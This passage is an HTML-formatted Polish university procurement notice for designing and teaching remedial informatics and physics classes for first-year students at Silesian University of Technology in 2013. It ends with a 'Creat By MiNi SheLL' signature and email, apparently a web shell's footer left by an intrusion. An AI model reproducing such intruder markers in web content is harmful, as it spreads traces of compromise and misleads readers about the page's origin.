- Niezwłoczne poinformowanie Zamawiającego o przerwaniu zajęć lub rezygnacji z uczestnictwa oraz o więcej niż trzech nieobecnościach studenta (tki) na zajęciach, jak również o innych sytuacjach, które mają wpływ na realizację przedmiotu umowy. Informacje te powinny zostać przekazane pisemnie lub elektronicznie w terminie do 3 dni od stwierdzenia ww. faktów.
- Prowadzenie: listy obecności studentów oraz studentek (podpis studenta (tki) na liście, podpis wykonawcy na liście obecności); kart czasu pracy; ewidencji godzin i zadań realizowanych
w projektach w ramach NSRO - jeśli dotyczy.
- Po realizacji każdych zajęć wykonawca jest zobowiązany do 5 dni przekazać Zamawiającemu listy obecności z przeprowadzonych zajęć oraz po zakończeniu całego cyklu zajęć wyrównawczych wypełnione ankiety ewaluacyjne.
- Do 5 dnia każdego miesiąca wykonawca jest zobowiązany do przekazania Zamawiającemu karty czasu pracy za miniony miesiąc oraz ewidencję godzin i zadań realizowanych w projektach w ramach NSRO - jeśli dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie programu zajęć wyrównawczych z przedmiotu informatyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na opracowaniu programu oraz materiałów dydaktycznych z zajęć wyrównawczych z przedmiotu Informatyka  dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; opracowanie programu nauczania dla 24 godzin lekcyjnych z zakresu tematycznego określonego w programie nauczania przewidzianego dla szkół ponadgimnazjalnych, tj.:
1.	Szczegółowe zapoznanie się ze zintegrowanym środowiskiem programistycznym i wykorzystanie jego możliwości do analizy poprawności kodu źródłowego.
2.	Rozwiązywanie problemów z użyciem metody wstępującej i zstępującej.
3.	Algorytmy wyszukiwania i sortowania.
4.	Wybrane algorytmy geometryczne.
5.	Algorytmy na tekstach.
6.	Algorytmy kompresji i szyfrowania.
7.	Projektowanie prostych baz danych opartych o pliki rekordowe.
8.	Wykorzystanie struktur dynamicznych do rozwiązywania problemów bazodanowych: dodawanie, edycja, usuwanie, sortowanie, zapewnianie integralności danych.
9.	Drzewa binarne jako przykład konstrukcji rekurencyjnej.
Do obowiązków Wykonawcy należy:
- Przygotowanie i złożenie w Biurze Projektu programu zajęć wyrównawczych. Wykonawca musi dostarczyć program zajęć w formie elektronicznej oraz papierowej do 3 dni po podpisaniu umowy.
- Przygotowanie i złożenie w Biurze Projektu materiałów dydaktycznych z zajęć wyrównawczych. Wykonawca musi dostarczyć materiały dydaktyczne w formie elektronicznej oraz papierowej co najmniej na 2 dni przed rozpoczęciem kolejnego bloku zajęć.
- Program zajęć oraz materiały dydaktyczne muszą być opracowane w formie elektronicznej, umożliwiającej dystrybucję przez serwis internetowy www. Szata graficzna musi być zgodna z wytycznymi dot. oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Po podpisaniu umowy, Zamawiający przekaże w ciągu 2 dni wytyczne dotyczące oznakowania wszystkich materiałów zgodnie z identyfikacją graficzną projektu.

Zamawiający przewiduje, iż wykonawca powinien przepracować do 72 godzin, bez możliwości zwiększenia liczby godzin. Konieczność wypracowania większej liczby godzin niż przewidziano w zamówieniu, nie zwalnia wykonawcy z realizacji zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie zajęć wyrównawczych z przedmiotu informatyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na przeprowadzeniu zajęć wyrównawczych z przedmiotu Informatyka
(w zakresie programu przygotowanego przez Wykonawcę w ramach zadania nr 3) dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej - 24 godzin lekcyjnych zajęć wyrównawczych (1 godzina lekcyjna = 45 minut) dla
1 grupy studentów oraz studentek (co najmniej 8 osób w grupie). Wykonawca przeprowadzi zajęcia z 10 grupami, w różnym terminie. Łączna liczba godzin: 240 godziny lekcyjne.
Tematy zajęć wyrównawczych z Informatyki określone w programie nauczania przewidzianego dla szkół ponadgimnazjalnych, tj.:
1.	Szczegółowe zapoznanie się ze zintegrowanym środowiskiem programistycznym i wykorzystanie jego możliwości do analizy poprawności kodu źródłowego.
2.	Rozwiązywanie problemów z użyciem metody wstępującej i zstępującej.
3.	Algorytmy wyszukiwania i sortowania.
4.	Wybrane algorytmy geometryczne.
5.	Algorytmy na tekstach.
6.	Algorytmy kompresji i szyfrowania.
7.	Projektowanie prostych baz danych opartych o pliki rekordowe.
8.	Wykorzystanie struktur dynamicznych do rozwiązywania problemów bazodanowych: dodawanie, edycja, usuwanie, sortowanie, zapewnianie integralności danych.
9.	Drzewa binarne jako przykład konstrukcji rekurencyjnej.
Do obowiązków Wykonawcy należy:
- Ustalenie harmonogramu i miejsca zajęć (w uzgodnieniu z pracownikami Biura Projektu) - godziny zajęć muszą być ustalone z Zamawiającym tak, aby nie kolidowały z planowymi zajęciami dydaktycznymi dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; zajęcia mogą być prowadzone od poniedziałku do piątku w godzinach od 13:00 do 20:00 oraz w sobotę w godzinach od 8:00 do 14:00. Szczegółowy harmonogram zajęć zostanie ustalony przez Zamawiającego i Wykonawcę do 2 dni od dnia podpisania umowy. Przedmiot zamówienia musi być zrealizowany od dnia podpisania umowy do 31 marca 2013 roku. 
- Przeprowadzenie zajęć zgodnie z ustalonym harmonogramem.
- Niezwłoczne poinformowanie Zamawiającego o przerwaniu zajęć lub rezygnacji z uczestnictwa oraz o więcej niż trzech nieobecnościach studenta/tki na zajęciach, jak również o innych sytuacjach, które mają wpływ na realizację przedmiotu umowy. Informacje te powinny zostać przekazane pisemnie lub elektronicznie w terminie do 3 dni od stwierdzenia ww. faktów.
- Prowadzenie: listy obecności studentów oraz studentek (podpis studenta/tki na liście, podpis wykonawcy na liście obecności); kart czasu pracy; ewidencji godzin i zadań realizowanych w projektach w ramach NSRO - jeśli dotyczy.
- Po realizacji każdych zajęć wykonawca jest zobowiązany do 5 dni przekazać Zamawiającemu listy obecności z przeprowadzonych zajęć oraz po zakończeniu całego cyklu zajęć wyrównawczych wypełnione ankiety ewaluacyjne.
- Do 5 dnia każdego miesiąca wykonawca jest zobowiązany do przekazania Zamawiającemu karty czasu pracy za miniony miesiąc oraz ewidencję godzin i zadań realizowanych w projektach w ramach NSRO- jeśli dotyczy.

Wszystkie dokumenty dotyczące przedmiotu zamówienia wykonawca będzie odbierał od Zamawiającego i (lub) dostarczał Zamawiającemu do Biura Projektu, Wydział Automatyki, Elektroniki i Informatyki Politechniki Śląskiej, 44-100 Gliwice, ul. Akademicka 16 (osoba do kontaktu będzie wskazana w umowie)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie programu zajęć wyrównawczych z przedmiotu fizyka z elementami elektrotechniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na opracowaniu programu oraz materiałów dydaktycznych z zajęć wyrównawczych z przedmiotu Fizyka z elementami elektrotechniki  dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; opracowanie programu nauczania dla 10 godzin lekcyjnych zajęć wyrównawczych z zakresu tematycznego określonego w programie nauczania przewidzianego dla szkół ponadgimnazjalnych, tj.:
1.	Elementarne zagadnienia o obwodach prądu stałego: prawo Ohma, szeregowe i równoległe połączenie rezystorów. 
2.	Pierwsze prawo Kirchhoffa dla obwodów prądu stałego, wprowadzenie i omówienie woltomierza.
3.	Drugie prawo Kirchhoffa dla obwodów prądu stałego, wprowadzenie i omówienie amperomierza.
4.	Idealne i rzeczywiste źródła energii, bateria, akumulator.
5.	Pomiar charakterystyki prądowo-napięciowej elementów liniowych (rezystor) i nieliniowych (żarówka).
Do obowiązków Wykonawcy należy:
- Przygotowanie i złożenie w Biurze Projektu programu zajęć wyrównawczych. Wykonawca musi dostarczyć program zajęć w formie elektronicznej oraz papierowej do 3 dni po podpisaniu umowy.
- Przygotowanie i złożenie w Biurze Projektu materiałów dydaktycznych z zajęć wyrównawczych. Wykonawca musi dostarczyć materiały dydaktyczne w formie elektronicznej oraz papierowej co najmniej na 2 dni przed rozpoczęciem kolejnego bloku zajęć.
- Program zajęć oraz materiały dydaktyczne muszą być opracowane w formie elektronicznej, umożliwiającej dystrybucję przez serwis internetowy www. Szata graficzna musi być zgodna z wytycznymi dot. oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Po podpisaniu umowy, Zamawiający przekaże w ciągu 2 dni wytyczne dotyczące oznakowania wszystkich materiałów zgodnie z identyfikacją graficzną projektu.

Zamawiający przewiduje, iż wykonawca powinien przepracować do 30 godzin, bez możliwości zwiększenia liczby godzin. Konieczność wypracowania większej liczby godzin niż przewidziano w zamówieniu, nie zwalnia wykonawcy z realizacji zamówienia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie zajęć wyrównawczych z przedmiotu fizyka z elementami elektrotechniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na przeprowadzeniu zajęć wyrównawczych z przedmiotu Fizyka z elementami elektrotechniki (w zakresie programu przygotowanego przez Wykonawcę w ramach zadania nr 5) dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej - 10 godzin lekcyjnych zajęć wyrównawczych (1 godzina lekcyjna = 45 minut) dla 1 grupy studentów oraz studentek (co najmniej 8 osób w grupie). Wykonawca przeprowadzi zajęcia z 10 grupami, w różnym terminie. Łączna liczba godzin: 100 godzin lekcyjnych.
Tematy zajęć wyrównawczych z zakresu Fizyki z elementami elektrotechniki określone w programie nauczania przewidzianego dla szkół ponadgimnazjalnych, tj.:
1.	Elementarne zagadnienia o obwodach prądu stałego: prawo Ohma, szeregowe i równoległe połączenie rezystorów. 
2.	Pierwsze prawo Kirchhoffa dla obwodów prądu stałego, wprowadzenie i omówienie woltomierza.
3.	Drugie prawo Kirchhoffa dla obwodów prądu stałego, wprowadzenie i omówienie amperomierza.
4.	Idealne i rzeczywiste źródła energii, bateria, akumulator.
5.	Pomiar charakterystyki prądowo-napięciowej elementów liniowych (rezystor) i nieliniowych (żarówka).
Wymagania dot. przedmiotu zamówienia:
- Zajęcia prowadzone w języku polskim.
- Treść zajęć wyrównawczych musi odpowiadać założeniom programu przygotowanego w ramach zadania nr 5. 
- Na koniec semestru (na ostatnich zajęciach) wykonawca jest zobowiązany do przeprowadzenia ankiety ewaluacyjnej na formularzach dostarczonych przez Biuro Projektu (inaczej Zamawiający). Ankieta będzie dotyczyła oceny merytorycznej i technicznej przebiegu zajęć.

Do obowiązków Wykonawcy należy:
- Ustalenie harmonogramu i miejsca zajęć (w uzgodnieniu z pracownikami Biura Projektu) - godziny zajęć muszą być ustalone z Zamawiającym tak, aby nie kolidowały z planowymi zajęciami dydaktycznymi dla studentów oraz studentek I roku studiów na kierunku Informatyka na Wydziale Automatyki, Elektroniki i Informatyki Politechniki Śląskiej; zajęcia mogą być prowadzone od poniedziałku do piątku w godzinach od 13:00 do 20:00 oraz w sobotę w godzinach od 8:00 do 14:00. Szczegółowy harmonogram zajęć zostanie ustalony przez Zamawiającego i Wykonawcę do 2 dni od dnia podpisania umowy. Przedmiot zamówienia musi być zrealizowany od dnia podpisania umowy do 31 marca 2013 roku. 
- Przeprowadzenie zajęć zgodnie z ustalonym harmonogramem.
- Niezwłoczne poinformowanie Zamawiającego o przerwaniu zajęć lub rezygnacji z uczestnictwa oraz o więcej niż trzech nieobecnościach studenta/tki na zajęciach, jak również o innych sytuacjach, które mają wpływ na realizację przedmiotu umowy. Informacje te powinny zostać przekazane pisemnie lub elektronicznie w terminie do 3 dni od stwierdzenia ww. faktów.
- Prowadzenie: listy obecności studentów oraz studentek (podpis studenta(tki) na liście, podpis wykonawcy na liście obecności); kart czasu pracy; ewidencji godzin i zadań realizowanych
w projektach w ramach NSRO - jeśli dotyczy.
- Po realizacji każdych zajęć wykonawca jest zobowiązany do 5 dni przekazać Zamawiającemu listy obecności z przeprowadzonych zajęć oraz po zakończeniu całego cyklu zajęć wyrównawczych wypełnione ankiety ewaluacyjne.
- Do 5 dnia każdego miesiąca wykonawca jest zobowiązany do przekazania Zamawiającemu karty czasu pracy za miniony miesiąc oraz ewidencję godzin i zadań realizowanych w projektach w ramach NSRO - jeśli dotyczy.

Wszystkie dokumenty dotyczące przedmiotu zamówienia wykonawca będzie odbierał od Zamawiającego i(lub) dostarczał Zamawiającemu do Biura Projektu, Wydział Automatyki, Elektroniki i Informatyki Politechniki Śląskiej, 44-100 Gliwice, ul. Akademicka 16 (osoba do kontaktu będzie wskazana w umowie)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com